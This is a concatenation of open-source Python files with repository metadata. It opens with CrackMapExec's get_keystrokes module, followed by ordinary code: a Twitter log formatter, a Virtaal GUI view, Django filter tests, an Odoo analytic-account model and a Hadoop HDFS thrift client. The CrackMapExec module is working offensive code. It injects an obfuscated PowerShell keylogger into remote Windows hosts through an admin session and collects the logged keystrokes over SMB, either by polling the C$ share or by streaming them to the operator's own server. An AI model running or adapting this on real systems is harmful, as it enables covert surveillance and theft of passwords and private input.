fp.close()
if __name__ == '__main__':
main(sys.argv)
| mit |
jorik041/CrackMapExec | cme/modules/get_keystrokes.py | 1 | 4591 | from cme.helpers.powershell import *
from cme.helpers.misc import gen_random_string
from cme.servers.smb import CMESMBServer
from gevent import sleep
from sys import exit
import os
class CMEModule:
'''
Executes PowerSploit's Get-Keystrokes script
Module by @byt3bl33d3r
'''
name = 'get_keystrokes'
description = "Logs keys pressed, time and the active window"
supported_protocols = ['smb', 'mssql']
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
'''
TIMEOUT Specifies the interval in minutes to capture keystrokes.
STREAM Specifies whether to stream the keys over the network (default: False)
POLL Specifies the interval in seconds to poll the log file (default: 20)
'''
if 'TIMEOUT' not in module_options:
context.log.error('TIMEOUT option is required!')
exit(1)
self.stream = False
self.poll = 20
self.timeout = int(module_options['TIMEOUT'])
if 'STREAM' in module_options:
self.stream = bool(module_options['STREAM'])
if 'POLL' in module_options:
self.poll = int(module_options['POLL'])
context.log.info('This module will not exit until CTRL-C is pressed')
context.log.info('Keystrokes will be stored in ~/.cme/logs\n')
self.ps_script1 = obfs_ps_script('cme_powershell_scripts/Invoke-PSInject.ps1')
self.ps_script2 = obfs_ps_script('powersploit/Exfiltration/Get-Keystrokes.ps1')
if self.stream:
self.share_name = gen_random_string(5).upper()
self.smb_server = CMESMBServer(context.log, self.share_name, context.log_folder_path)
self.smb_server.start()
else:
self.file_name = gen_random_string(5)
def on_admin_login(self, context, connection):
keys_folder = 'get_keystrokes_{}'.format(connection.host)
if not self.stream:
command = 'Get-Keystrokes -LogPath "$Env:Temp\\{}" -Timeout {}'.format(self.file_name, self.timeout)
else:
command = 'Get-Keystrokes -LogPath \\\\{}\\{}\\{}\\keys.log -Timeout {}'.format(context.localip, self.share_name, keys_folder, self.timeout)
keys_command = gen_ps_iex_cradle(context, 'Get-Keystrokes.ps1', command, post_back=False)
launcher = gen_ps_inject(keys_command, context)
connection.ps_execute(launcher)
context.log.success('Executed launcher')
if not self.stream:
users = connection.loggedon_users()
keys_folder_path = os.path.join(context.log_folder_path, keys_folder)
try:
while True:
for user in users:
if '$' not in user.wkui1_username and os.path.exists(keys_folder_path):
keys_log = os.path.join(keys_folder_path, 'keys_{}.log'.format(user.wkui1_username))
with open(keys_log, 'a+') as key_file:
file_path = '/Users/{}/AppData/Local/Temp/{}'.format(user.wkui1_username, self.file_name)
try:
connection.conn.getFile('C$', file_path, key_file.write)
context.log.success('Got keys! Stored in {}'.format(keys_log))
except Exception as e:
context.log.debug('Error retrieving key file contents from {}: {}'.format(file_path, e))
sleep(self.poll)
except KeyboardInterrupt:
pass
def on_request(self, context, request):
if 'Invoke-PSInject.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
request.wfile.write(self.ps_script1)
elif 'Get-Keystrokes.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
# We received the callback, so lets setup the folder to store the keys
keys_folder_path = os.path.join(context.log_folder_path, 'get_keystrokes_{}'.format(request.client_address[0]))
if not os.path.exists(keys_folder_path): os.mkdir(keys_folder_path)
request.wfile.write(self.ps_script2)
request.stop_tracking_host()
else:
request.send_response(404)
request.end_headers()
def on_shutdown(self, context, connection):
if self.stream:
self.smb_server.shutdown()
| bsd-2-clause |
foursquare/commons-old | src/python/twitter/common/log/formatters/plain.py | 16 | 1610 | # ==================================================================================================
# Copyright 2011 Twitter, Inc.
# --------------------------------------------------------------------------------------------------
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this work except in compliance with the License.
# You may obtain a copy of the License in the LICENSE file, or at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==================================================================================================
import logging
from twitter.common.log.formatters.base import format_message
class PlainFormatter(logging.Formatter):
"""
Format a log in a plainer style:
type] msg
"""
SCHEME = 'plain'
LEVEL_MAP = {
logging.FATAL: 'FATAL',
logging.ERROR: 'ERROR',
logging.WARN: ' WARN',
logging.INFO: ' INFO',
logging.DEBUG: 'DEBUG'
}
def __init__(self):
logging.Formatter.__init__(self)
def format(self, record):
try:
level = PlainFormatter.LEVEL_MAP[record.levelno]
except:
level = '?????'
record_message = '%s] %s' % (level, format_message(record))
record.getMessage = lambda: record_message
return logging.Formatter.format(self, record)
| apache-2.0 |
scootergrisen/virtaal | virtaal/views/langview.py | 6 | 8842 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2009-2011 Zuza Software Foundation
#
# This file is part of Virtaal.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
import os
import gobject
import gtk
import gtk.gdk
import logging
from virtaal.common import GObjectWrapper
from virtaal.models.langmodel import LanguageModel
from baseview import BaseView
from widgets.popupmenubutton import PopupMenuButton
class LanguageView(BaseView):
"""
Manages the language selection on the GUI and communicates with its associated
C{LanguageController}.
"""
# INITIALIZERS #
def __init__(self, controller):
self.controller = controller
self._init_gui()
def _create_dialogs(self):
from widgets.langselectdialog import LanguageSelectDialog
from widgets.langadddialog import LanguageAddDialog
langs = [LanguageModel(lc) for lc in LanguageModel.languages]
langs.sort(key=lambda x: x.name)
self.select_dialog = LanguageSelectDialog(langs, parent=self.controller.main_controller.view.main_window)
self.select_dialog.btn_add.connect('clicked', self._on_addlang_clicked)
self.add_dialog = LanguageAddDialog(parent=self.select_dialog.dialog)
def _init_gui(self):
self.menu = None
self.popupbutton = PopupMenuButton()
self.popupbutton.connect('toggled', self._on_button_toggled)
self.controller.main_controller.view.main_window.connect(
'style-set', self._on_style_set
)
if self.controller.recent_pairs:
self.popupbutton.text = self._get_display_string(*self.controller.recent_pairs[0])
def _init_menu(self):
self.menu = gtk.Menu()
self.popupbutton.set_menu(self.menu)
self.recent_items = []
for i in range(self.controller.NUM_RECENT):
item = gtk.MenuItem('')
item.connect('activate', self._on_pairitem_activated, i)
self.recent_items.append(item)
seperator = gtk.SeparatorMenuItem()
self.other_item = gtk.MenuItem(_('_New Language Pair...'))
self.other_item.connect('activate', self._on_other_activated)
[self.menu.append(item) for item in (seperator, self.other_item)]
self.update_recent_pairs()
self.controller.main_controller.view.main_window.connect(
'style-set', self._on_style_set
)
# METHODS #
def _get_display_string(self, srclang, tgtlang):
if self.popupbutton.get_direction() == gtk.TEXT_DIR_RTL:
# We need to make sure we get the direction correct if the
# language names are untranslated. The right-to-left embedding
# (RLE) characters ensure that untranslated language names will
# still diplay with the correct direction as they are present
# in the interface.
pairlabel = u'\u202b%s β \u202b%s' % (srclang.name, tgtlang.name)
else:
pairlabel = u'%s β %s' % (srclang.name, tgtlang.name)
# While it seems that the arrows are not well supported on Windows
# systems, we fall back to using the French quotes. It automatically
# does the right thing for RTL.
if os.name == 'nt':
pairlabel = u'%s Β» %s' % (srclang.name, tgtlang.name)
return pairlabel
def notify_same_langs(self):
def notify():
for s in [gtk.STATE_ACTIVE, gtk.STATE_NORMAL, gtk.STATE_PRELIGHT, gtk.STATE_SELECTED]:
self.popupbutton.child.modify_fg(s, gtk.gdk.color_parse('#f66'))
gobject.idle_add(notify)
def notify_diff_langs(self):
def notify():
if hasattr(self, 'popup_default_fg'):
fgcol = self.popup_default_fg
else:
fgcol = gtk.widget_get_default_style().fg
for s in [gtk.STATE_ACTIVE, gtk.STATE_NORMAL, gtk.STATE_PRELIGHT, gtk.STATE_SELECTED]:
self.popupbutton.child.modify_fg(s, fgcol[s])
gobject.idle_add(notify)
def show(self):
"""Add the managed C{PopupMenuButton} to the C{MainView}'s status bar."""
statusbar = self.controller.main_controller.view.status_bar
for child in statusbar.get_children():
if child is self.popupbutton:
return
statusbar.pack_end(self.popupbutton, expand=False)
statusbar.show_all()
def focus(self):
self.popupbutton.grab_focus()
def update_recent_pairs(self):
if not self.menu:
self._init_menu()
# Clear all menu items
for i in range(self.controller.NUM_RECENT):
item = self.recent_items[i]
if item.parent is self.menu:
item.get_child().set_text('')
self.menu.remove(item)
# Update menu items' strings
i = 0
for pair in self.controller.recent_pairs:
if i not in range(self.controller.NUM_RECENT):
break
self.recent_items[i].get_child().set_text_with_mnemonic(
"_%(accesskey)d. %(language_pair)s" % {
"accesskey": i + 1,
"language_pair": self._get_display_string(*pair)
}
)
i += 1
# Re-add menu items that have something to show
for i in range(self.controller.NUM_RECENT):
item = self.recent_items[i]
if item.get_child().get_text():
self.menu.insert(item, i)
self.menu.show_all()
self.popupbutton.text = self.recent_items[0].get_child().get_text()[3:]
# EVENT HANDLERS #
def _on_addlang_clicked(self, button):
if not self.add_dialog.run():
return
err = self.add_dialog.check_input_sanity()
if err:
self.controller.main_controller.show_error(err)
return
name = self.add_dialog.langname
code = self.add_dialog.langcode
nplurals = self.add_dialog.nplurals
plural = self.add_dialog.plural
if self.add_dialog.langcode in LanguageModel.languages:
raise Exception('Language code %s already used.' % (code))
LanguageModel.languages[code] = (name, nplurals, plural)
self.controller.new_langs.append(code)
# Reload the language data in the selection dialog.
self.select_dialog.clear_langs()
langs = [LanguageModel(lc) for lc in LanguageModel.languages]
langs.sort(key=lambda x: x.name)
self.select_dialog.update_languages(langs)
def _on_button_toggled(self, popupbutton):
if not popupbutton.get_active():
return
detected = self.controller.get_detected_langs()
if detected and len(detected) == 2 and detected[0] and detected[1]:
logging.debug("Detected language pair: %s -> %s" % (detected[0].code, detected[1].code))
if detected not in self.controller.recent_pairs:
if len(self.controller.recent_pairs) >= self.controller.NUM_RECENT:
self.controller.recent_pairs[-1] = detected
else:
self.controller.recent_pairs.append(detected)
self.update_recent_pairs()
def _on_other_activated(self, menuitem):
if not getattr(self, 'select_dialog', None):
self._create_dialogs()
if self.select_dialog.run(self.controller.source_lang.code, self.controller.target_lang.code):
self.controller.set_language_pair(
self.select_dialog.get_selected_source_lang(),
self.select_dialog.get_selected_target_lang()
)
self.controller.main_controller.unit_controller.view.targets[0].grab_focus()
def _on_pairitem_activated(self, menuitem, item_n):
logging.debug('Selected language pair: %s' % (self.recent_items[item_n].get_child().get_text()))
pair = self.controller.recent_pairs[item_n]
self.controller.set_language_pair(*pair)
self.controller.main_controller.unit_controller.view.targets[0].grab_focus()
def _on_style_set(self, widget, prev_style):
if not hasattr(self, 'popup_default_fg'):
self.popup_default_fg = widget.style.fg
| gpl-2.0 |
mshafiq9/django | tests/template_tests/filter_tests/test_truncatewords.py | 215 | 1705 | from django.template.defaultfilters import truncatewords
from django.test import SimpleTestCase
from django.utils.safestring import mark_safe
from ..utils import setup
class TruncatewordsTests(SimpleTestCase):
@setup({'truncatewords01':
'{% autoescape off %}{{ a|truncatewords:"2" }} {{ b|truncatewords:"2"}}{% endautoescape %}'})
def test_truncatewords01(self):
output = self.engine.render_to_string('truncatewords01', {'a': 'alpha & bravo', 'b': mark_safe('alpha & bravo')})
self.assertEqual(output, 'alpha & ... alpha & ...')
@setup({'truncatewords02': '{{ a|truncatewords:"2" }} {{ b|truncatewords:"2"}}'})
def test_truncatewords02(self):
output = self.engine.render_to_string('truncatewords02', {'a': 'alpha & bravo', 'b': mark_safe('alpha & bravo')})
self.assertEqual(output, 'alpha & ... alpha & ...')
class FunctionTests(SimpleTestCase):
def test_truncate(self):
self.assertEqual(truncatewords('A sentence with a few words in it', 1), 'A ...')
def test_truncate2(self):
self.assertEqual(
truncatewords('A sentence with a few words in it', 5),
'A sentence with a few ...',
)
def test_overtruncate(self):
self.assertEqual(
truncatewords('A sentence with a few words in it', 100),
'A sentence with a few words in it',
)
def test_invalid_number(self):
self.assertEqual(
truncatewords('A sentence with a few words in it', 'not a number'),
'A sentence with a few words in it',
)
def test_non_string_input(self):
self.assertEqual(truncatewords(123, 2), '123')
| bsd-3-clause |
simongoffin/my_odoo_tutorial | addons/analytic/analytic.py | 12 | 17961 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from datetime import datetime
from openerp.osv import fields, osv
from openerp import tools
from openerp.tools.translate import _
import openerp.addons.decimal_precision as dp
class account_analytic_account(osv.osv):
_name = 'account.analytic.account'
_inherit = ['mail.thread']
_description = 'Analytic Account'
_track = {
'state': {
'analytic.mt_account_pending': lambda self, cr, uid, obj, ctx=None: obj.state == 'pending',
'analytic.mt_account_closed': lambda self, cr, uid, obj, ctx=None: obj.state == 'close',
'analytic.mt_account_opened': lambda self, cr, uid, obj, ctx=None: obj.state == 'open',
},
}
def _compute_level_tree(self, cr, uid, ids, child_ids, res, field_names, context=None):
currency_obj = self.pool.get('res.currency')
recres = {}
def recursive_computation(account):
result2 = res[account.id].copy()
for son in account.child_ids:
result = recursive_computation(son)
for field in field_names:
if (account.currency_id.id != son.currency_id.id) and (field!='quantity'):
result[field] = currency_obj.compute(cr, uid, son.currency_id.id, account.currency_id.id, result[field], context=context)
result2[field] += result[field]
return result2
for account in self.browse(cr, uid, ids, context=context):
if account.id not in child_ids:
continue
recres[account.id] = recursive_computation(account)
return recres
def _debit_credit_bal_qtty(self, cr, uid, ids, fields, arg, context=None):
res = {}
if context is None:
context = {}
child_ids = tuple(self.search(cr, uid, [('parent_id', 'child_of', ids)]))
for i in child_ids:
res[i] = {}
for n in fields:
res[i][n] = 0.0
if not child_ids:
return res
where_date = ''
where_clause_args = [tuple(child_ids)]
if context.get('from_date', False):
where_date += " AND l.date >= %s"
where_clause_args += [context['from_date']]
if context.get('to_date', False):
where_date += " AND l.date <= %s"
where_clause_args += [context['to_date']]
cr.execute("""
SELECT a.id,
sum(
CASE WHEN l.amount > 0
THEN l.amount
ELSE 0.0
END
) as debit,
sum(
CASE WHEN l.amount < 0
THEN -l.amount
ELSE 0.0
END
) as credit,
COALESCE(SUM(l.amount),0) AS balance,
COALESCE(SUM(l.unit_amount),0) AS quantity
FROM account_analytic_account a
LEFT JOIN account_analytic_line l ON (a.id = l.account_id)
WHERE a.id IN %s
""" + where_date + """
GROUP BY a.id""", where_clause_args)
for row in cr.dictfetchall():
res[row['id']] = {}
for field in fields:
res[row['id']][field] = row[field]
return self._compute_level_tree(cr, uid, ids, child_ids, res, fields, context)
def name_get(self, cr, uid, ids, context=None):
res = []
if not ids:
return res
if isinstance(ids, (int, long)):
ids = [ids]
for id in ids:
elmt = self.browse(cr, uid, id, context=context)
res.append((id, self._get_one_full_name(elmt)))
return res
def _get_full_name(self, cr, uid, ids, name=None, args=None, context=None):
if context == None:
context = {}
res = {}
for elmt in self.browse(cr, uid, ids, context=context):
res[elmt.id] = self._get_one_full_name(elmt)
return res
def _get_one_full_name(self, elmt, level=6):
if level<=0:
return '...'
if elmt.parent_id and not elmt.type == 'template':
parent_path = self._get_one_full_name(elmt.parent_id, level-1) + " / "
else:
parent_path = ''
return parent_path + elmt.name
def _child_compute(self, cr, uid, ids, name, arg, context=None):
result = {}
if context is None:
context = {}
for account in self.browse(cr, uid, ids, context=context):
result[account.id] = map(lambda x: x.id, [child for child in account.child_ids if child.state != 'template'])
return result
def _get_analytic_account(self, cr, uid, ids, context=None):
company_obj = self.pool.get('res.company')
analytic_obj = self.pool.get('account.analytic.account')
accounts = []
for company in company_obj.browse(cr, uid, ids, context=context):
accounts += analytic_obj.search(cr, uid, [('company_id', '=', company.id)])
return accounts
def _set_company_currency(self, cr, uid, ids, name, value, arg, context=None):
if isinstance(ids, (int, long)):
ids=[ids]
for account in self.browse(cr, uid, ids, context=context):
if account.company_id:
if account.company_id.currency_id.id != value:
raise osv.except_osv(_('Error!'), _("If you set a company, the currency selected has to be the same as it's currency. \nYou can remove the company belonging, and thus change the currency, only on analytic account of type 'view'. This can be really useful for consolidation purposes of several companies charts with different currencies, for example."))
if value:
cr.execute("""update account_analytic_account set currency_id=%s where id=%s""", (value, account.id))
self.invalidate_cache(cr, uid, ['currency_id'], [account.id], context=context)
def _currency(self, cr, uid, ids, field_name, arg, context=None):
result = {}
for rec in self.browse(cr, uid, ids, context=context):
if rec.company_id:
result[rec.id] = rec.company_id.currency_id.id
else:
result[rec.id] = rec.currency_id.id
return result
_columns = {
'name': fields.char('Account/Contract Name', required=True, track_visibility='onchange'),
'complete_name': fields.function(_get_full_name, type='char', string='Full Name'),
'code': fields.char('Reference', select=True, track_visibility='onchange', copy=False),
'type': fields.selection([('view','Analytic View'), ('normal','Analytic Account'),('contract','Contract or Project'),('template','Template of Contract')], 'Type of Account', required=True,
help="If you select the View Type, it means you won\'t allow to create journal entries using that account.\n"\
"The type 'Analytic account' stands for usual accounts that you only want to use in accounting.\n"\
"If you select Contract or Project, it offers you the possibility to manage the validity and the invoicing options for this account.\n"\
"The special type 'Template of Contract' allows you to define a template with default data that you can reuse easily."),
'template_id': fields.many2one('account.analytic.account', 'Template of Contract'),
'description': fields.text('Description'),
'parent_id': fields.many2one('account.analytic.account', 'Parent Analytic Account', select=2),
'child_ids': fields.one2many('account.analytic.account', 'parent_id', 'Child Accounts'),
'child_complete_ids': fields.function(_child_compute, relation='account.analytic.account', string="Account Hierarchy", type='many2many'),
'line_ids': fields.one2many('account.analytic.line', 'account_id', 'Analytic Entries'),
'balance': fields.function(_debit_credit_bal_qtty, type='float', string='Balance', multi='debit_credit_bal_qtty', digits_compute=dp.get_precision('Account')),
'debit': fields.function(_debit_credit_bal_qtty, type='float', string='Debit', multi='debit_credit_bal_qtty', digits_compute=dp.get_precision('Account')),
'credit': fields.function(_debit_credit_bal_qtty, type='float', string='Credit', multi='debit_credit_bal_qtty', digits_compute=dp.get_precision('Account')),
'quantity': fields.function(_debit_credit_bal_qtty, type='float', string='Quantity', multi='debit_credit_bal_qtty'),
'quantity_max': fields.float('Prepaid Service Units', help='Sets the higher limit of time to work on the contract, based on the timesheet. (for instance, number of hours in a limited support contract.)'),
'partner_id': fields.many2one('res.partner', 'Customer'),
'user_id': fields.many2one('res.users', 'Project Manager', track_visibility='onchange'),
'manager_id': fields.many2one('res.users', 'Account Manager', track_visibility='onchange'),
'date_start': fields.date('Start Date'),
'date': fields.date('Expiration Date', select=True, track_visibility='onchange'),
'company_id': fields.many2one('res.company', 'Company', required=False), #not required because we want to allow different companies to use the same chart of account, except for leaf accounts.
'state': fields.selection([('template', 'Template'),
('draft','New'),
('open','In Progress'),
('pending','To Renew'),
('close','Closed'),
('cancelled', 'Cancelled')],
'Status', required=True,
track_visibility='onchange', copy=False),
'currency_id': fields.function(_currency, fnct_inv=_set_company_currency, #the currency_id field is readonly except if it's a view account and if there is no company
store = {
'res.company': (_get_analytic_account, ['currency_id'], 10),
}, string='Currency', type='many2one', relation='res.currency'),
}
def on_change_template(self, cr, uid, ids, template_id, date_start=False, context=None):
if not template_id:
return {}
res = {'value':{}}
template = self.browse(cr, uid, template_id, context=context)
if template.date_start and template.date:
from_dt = datetime.strptime(template.date_start, tools.DEFAULT_SERVER_DATE_FORMAT)
to_dt = datetime.strptime(template.date, tools.DEFAULT_SERVER_DATE_FORMAT)
timedelta = to_dt - from_dt
res['value']['date'] = datetime.strftime(datetime.now() + timedelta, tools.DEFAULT_SERVER_DATE_FORMAT)
if not date_start:
res['value']['date_start'] = fields.date.today()
res['value']['quantity_max'] = template.quantity_max
res['value']['parent_id'] = template.parent_id and template.parent_id.id or False
res['value']['description'] = template.description
return res
def on_change_partner_id(self, cr, uid, ids,partner_id, name, context=None):
res={}
if partner_id:
partner = self.pool.get('res.partner').browse(cr, uid, partner_id, context=context)
if partner.user_id:
res['manager_id'] = partner.user_id.id
if not name:
res['name'] = _('Contract: ') + partner.name
return {'value': res}
def _default_company(self, cr, uid, context=None):
user = self.pool.get('res.users').browse(cr, uid, uid, context=context)
if user.company_id:
return user.company_id.id
return self.pool.get('res.company').search(cr, uid, [('parent_id', '=', False)])[0]
def _get_default_currency(self, cr, uid, context=None):
user = self.pool.get('res.users').browse(cr, uid, uid, context=context)
return user.company_id.currency_id.id
_defaults = {
'type': 'normal',
'company_id': _default_company,
'code' : lambda obj, cr, uid, context: obj.pool.get('ir.sequence').get(cr, uid, 'account.analytic.account'),
'state': 'open',
'user_id': lambda self, cr, uid, ctx: uid,
'partner_id': lambda self, cr, uid, ctx: ctx.get('partner_id', False),
'date_start': lambda *a: time.strftime('%Y-%m-%d'),
'currency_id': _get_default_currency,
}
def check_recursion(self, cr, uid, ids, context=None, parent=None):
return super(account_analytic_account, self)._check_recursion(cr, uid, ids, context=context, parent=parent)
_order = 'code, name asc'
_constraints = [
(check_recursion, 'Error! You cannot create recursive analytic accounts.', ['parent_id']),
]
def name_create(self, cr, uid, name, context=None):
raise osv.except_osv(_('Warning'), _("Quick account creation disallowed."))
def copy(self, cr, uid, id, default=None, context=None):
if not default:
default = {}
analytic = self.browse(cr, uid, id, context=context)
default['name'] = _("%s (copy)") % analytic['name']
return super(account_analytic_account, self).copy(cr, uid, id, default, context=context)
def on_change_company(self, cr, uid, id, company_id):
if not company_id:
return {}
currency = self.pool.get('res.company').read(cr, uid, [company_id], ['currency_id'])[0]['currency_id']
return {'value': {'currency_id': currency}}
def on_change_parent(self, cr, uid, id, parent_id):
if not parent_id:
return {}
parent = self.read(cr, uid, [parent_id], ['partner_id','code'])[0]
if parent['partner_id']:
partner = parent['partner_id'][0]
else:
partner = False
res = {'value': {}}
if partner:
res['value']['partner_id'] = partner
return res
def name_search(self, cr, uid, name, args=None, operator='ilike', context=None, limit=100):
if not args:
args=[]
if context is None:
context={}
if name:
account_ids = self.search(cr, uid, [('code', '=', name)] + args, limit=limit, context=context)
if not account_ids:
dom = []
for name2 in name.split('/'):
name = name2.strip()
account_ids = self.search(cr, uid, dom + [('name', 'ilike', name)] + args, limit=limit, context=context)
if not account_ids: break
dom = [('parent_id','in',account_ids)]
else:
account_ids = self.search(cr, uid, args, limit=limit, context=context)
return self.name_get(cr, uid, account_ids, context=context)
class account_analytic_line(osv.osv):
_name = 'account.analytic.line'
_description = 'Analytic Line'
_columns = {
'name': fields.char('Description', required=True),
'date': fields.date('Date', required=True, select=True),
'amount': fields.float('Amount', required=True, help='Calculated by multiplying the quantity and the price given in the Product\'s cost price. Always expressed in the company main currency.', digits_compute=dp.get_precision('Account')),
'unit_amount': fields.float('Quantity', help='Specifies the amount of quantity to count.'),
'account_id': fields.many2one('account.analytic.account', 'Analytic Account', required=True, ondelete='restrict', select=True, domain=[('type','<>','view')]),
'user_id': fields.many2one('res.users', 'User'),
'company_id': fields.related('account_id', 'company_id', type='many2one', relation='res.company', string='Company', store=True, readonly=True),
}
def _get_default_date(self, cr, uid, context=None):
return fields.date.context_today(self, cr, uid, context=context)
def __get_default_date(self, cr, uid, context=None):
return self._get_default_date(cr, uid, context=context)
_defaults = {
'date': __get_default_date,
'company_id': lambda self,cr,uid,c: self.pool.get('res.company')._company_default_get(cr, uid, 'account.analytic.line', context=c),
'amount': 0.00
}
_order = 'date desc'
def _check_no_view(self, cr, uid, ids, context=None):
analytic_lines = self.browse(cr, uid, ids, context=context)
for line in analytic_lines:
if line.account_id.type == 'view':
return False
return True
_constraints = [
(_check_no_view, 'You cannot create analytic line on view account.', ['account_id']),
]
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
liangly/hadoop-common | src/contrib/thriftfs/scripts/hdfs.py | 116 | 14991 | #!/usr/bin/env python
"""
hdfs.py is a python client for the thrift interface to HDFS.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
implied. See the License for the specific language governing permissions
and limitations under the License.
"""
import sys
sys.path.append('../gen-py')
from optparse import OptionParser
from thrift import Thrift
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from hadoopfs import ThriftHadoopFileSystem
from hadoopfs.ttypes import *
from readline import *
from cmd import *
import os
import re
import readline
import subprocess
#
# The address of the FileSystemClientProxy. If the host and port are
# not specified, then a proxy server is automatically spawned.
#
host = 'localhost'
port = 4677 # use any port
proxyStartScript = './start_thrift_server.sh'
startServer = True # shall we start a proxy server?
#
# The hdfs interactive shell. The Cmd class is a builtin that uses readline + implements
# a whole bunch of utility stuff like help and custom tab completions.
# It makes everything real easy.
#
class hadoopthrift_cli(Cmd):
# my custom prompt looks better than the default
prompt = 'hdfs>> '
#############################
# Class constructor
#############################
def __init__(self, server_name, server_port):
Cmd.__init__(self)
self.server_name = server_name
self.server_port = server_port
#############################
# Start the ClientProxy Server if we can find it.
# Read in its stdout to determine what port it is running on
#############################
def startProxyServer(self):
try:
p = subprocess.Popen(proxyStartScript, self.server_port, stdout=subprocess.PIPE)
content = p.stdout.readline()
p.stdout.close()
val = re.split( '\[|\]', content)
print val[1]
self.server_port = val[1]
return True
except Exception, ex:
print "ERROR in starting proxy server " + proxyStartScript
print '%s' % (ex.message)
return False
#############################
# Connect to clientproxy
#############################
def connect(self):
try:
# connect to hdfs thrift server
self.transport = TSocket.TSocket(self.server_name, self.server_port)
self.transport = TTransport.TBufferedTransport(self.transport)
self.protocol = TBinaryProtocol.TBinaryProtocol(self.transport)
# Create a client to use the protocol encoder
self.client = ThriftHadoopFileSystem.Client(self.protocol)
self.transport.open()
# tell the HadoopThrift server to die after 60 minutes of inactivity
self.client.setInactivityTimeoutPeriod(60*60)
return True
except Thrift.TException, tx:
print "ERROR in connecting to ", self.server_name, ":", self.server_port
print '%s' % (tx.message)
return False
#
# Disconnect from client proxy
#
def shutdown(self):
try :
self.transport.close()
except Exception, tx:
return False
#############################
# Create the specified file. Returns a handle to write data.
#############################
def do_create(self, name):
if name == "":
print " ERROR usage: create <pathname>"
print
return 0
# Create the file, and immediately closes the handle
path = Pathname();
path.pathname = name;
status = self.client.create(path)
self.client.close(status)
return 0
#############################
# Delete the specified file.
#############################
def do_rm(self, name):
if name == "":
print " ERROR usage: rm <pathname>\n"
return 0
# delete file
path = Pathname();
path.pathname = name;
status = self.client.rm(path, False)
if status == False:
print " ERROR in deleting path: " + name
return 0
#############################
# Rename the specified file/dir
#############################
def do_mv(self, line):
params = line.split()
if (len(params) != 2):
print " ERROR usage: mv <srcpathname> <destpathname>\n"
return 0
src = params[0].strip()
dest = params[1].strip()
if src == "":
print " ERROR usage: mv <srcpathname> <destpathname>\n"
return 0
if dest == "":
print " ERROR usage: mv <srcpathname> <destpathname>\n"
return 0
# move file
path = Pathname();
path.pathname = src;
destpath = Pathname();
destpath.pathname = dest;
status = self.client.rename(path, destpath)
if status == False:
print " ERROR in renaming path: " + name
return 0
#############################
# Delete the specified file.
#############################
def do_mkdirs(self, name):
if name == "":
print " ERROR usage: mkdirs <pathname>\n"
return 0
# create directory
path = Pathname();
path.pathname = name;
fields = self.client.mkdirs(path)
return 0
#############################
# does the pathname exist?
#############################
def do_exists(self, name):
if name == "":
print " ERROR usage: exists <pathname>\n"
return 0
# check existence of pathname
path = Pathname();
path.pathname = name;
fields = self.client.exists(path)
if (fields == True):
print name + " exists."
else:
print name + " does not exist."
return 0
#############################
# copy local file into hdfs
#############################
def do_put(self, line):
params = line.split()
if (len(params) != 2):
print " ERROR usage: put <localpathname> <hdfspathname>\n"
return 0
local = params[0].strip()
hdfs = params[1].strip()
if local == "":
print " ERROR usage: put <localpathname> <hdfspathname>\n"
return 0
if hdfs == "":
print " ERROR usage: put <localpathname> <hdfspathname>\n"
return 0
# open local file
input = open(local, 'rb')
# open output file
path = Pathname();
path.pathname = hdfs;
output = self.client.create(path)
# read 1MB at a time and upload to hdfs
while True:
chunk = input.read(1024*1024)
if not chunk: break
self.client.write(output, chunk)
self.client.close(output)
input.close()
#############################
# copy hdfs file into local
#############################
def do_get(self, line):
params = line.split()
if (len(params) != 2):
print " ERROR usage: get <hdfspathname> <localpathname>\n"
return 0
hdfs = params[0].strip()
local = params[1].strip()
if local == "":
print " ERROR usage: get <hdfspathname> <localpathname>\n"
return 0
if hdfs == "":
print " ERROR usage: get <hdfspathname> <localpathname>\n"
return 0
# open output local file
output = open(local, 'wb')
# open input hdfs file
path = Pathname();
path.pathname = hdfs;
input = self.client.open(path)
# find size of hdfs file
filesize = self.client.stat(path).length
# read 1MB bytes at a time from hdfs
offset = 0
chunksize = 1024 * 1024
while True:
chunk = self.client.read(input, offset, chunksize)
if not chunk: break
output.write(chunk)
offset += chunksize
if (offset >= filesize): break
self.client.close(input)
output.close()
#############################
# List attributes of this path
#############################
def do_ls(self, name):
if name == "":
print " ERROR usage: list <pathname>\n"
return 0
# list file status
path = Pathname();
path.pathname = name;
status = self.client.stat(path)
if (status.isdir == False):
self.printStatus(status)
return 0
# This is a directory, fetch its contents
liststatus = self.client.listStatus(path)
for item in liststatus:
self.printStatus(item)
#############################
# Set permissions for a file
#############################
def do_chmod(self, line):
params = line.split()
